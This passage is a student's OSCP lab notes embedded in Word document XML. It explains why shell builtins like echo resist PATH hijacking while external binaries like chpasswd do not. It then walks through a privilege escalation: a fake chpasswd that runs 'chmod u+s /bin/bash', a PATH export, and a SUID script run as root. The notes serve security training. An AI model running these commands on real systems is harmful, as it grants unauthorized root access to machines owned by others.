          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-B .149 for priv esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we hijacked the command chpasswd because it didn't have a full path. But, then I tried hijacking echo, and it didn't work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002610">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002611">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because echo and chpasswd are not the same type of command! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002612">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002613">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell builtins (not hijackable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002614">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo is shell builtin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002615">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Things like echo, cd, pwd, test, readonly, shift, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002616">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are built into bash (or whatever shell is running). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The shell executes them directly, bypassing $PATH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002617">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if a file exists in /bin with the same name (/bin/echo), the shell uses its builtin unless explicitly told otherwise (/bin/echo or command echo).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002618">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002619">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">External binaries (hijackable if not called with full path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chpasswd is an external binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Things like ls, cp, passwd, chpasswd, id, cat, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These live in /bin, /usr/bin, /sbin, /usr/sbin, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a script calls them without an absolute path (just chpasswd instead of /usr/sbin/chpasswd), the shell resolves them via $PATH. This is where hijacking works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000261F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002620">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check if a command/binary is built-in or external:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type -a &lt;name&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type &lt;name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002622">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2835714" cy="1176821"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="512" name="image496.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image496.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId804"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2835714" cy="1176821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002623">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Echo is shell builtin as seen here, so not hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002624">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3652838" cy="740346"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="537" name="image529.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image529.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId805"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3652838" cy="740346"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002625">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are no mentions of shell builtin so this is hijakable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002626">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fr5vuh9iyaft" w:id="338"/>
      <w:bookmarkEnd w:id="338"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example with custom script (with SUID bit set) calling chpasswd but without full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002627">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002628">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP-B .149 for priv esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002629">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priv Esc (via PATH hijack and SUID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262B">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When we look at the RESET_PASSWORD script in our home directory, we see this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>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356100" cy="3238500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="487" name="image464.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image464.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId806"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43561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262D">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From earlier, we know this script changes the password of Kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262E">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But here, it uses chpasswd without specifying the full path to the binary. Meaning we can inject our own chpasswd binary and specify it first in the PATH variable and run the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000262F">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And we check if we have SUID set on RESET_PASSWORD which means we can run this script as root since it's owned by root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002630">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So, go to home directory (/home/john)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002631">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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touch chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002632">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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nano chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002633">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002634">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002635">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chmod u+s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002636">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/echo Done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002637">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This sets SUID bit to /bin/bash and echoes "Done"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002638">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And then make it executable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002639">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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chmod +x chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263A">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And then change Path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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export PATH=/home/john:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts /home/john at the start of PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263D">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And then we check to see if it recognize our path first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="101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which chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000263F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This outputs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002640">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And btw, I ran this before without doing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first and it didn't work. this is because "which" only looks at executable files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002641">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And then now we just run RESET_PASSWORD, which runs it as root cuz of SUID</w:t>
      </w:r>
    </w:p>
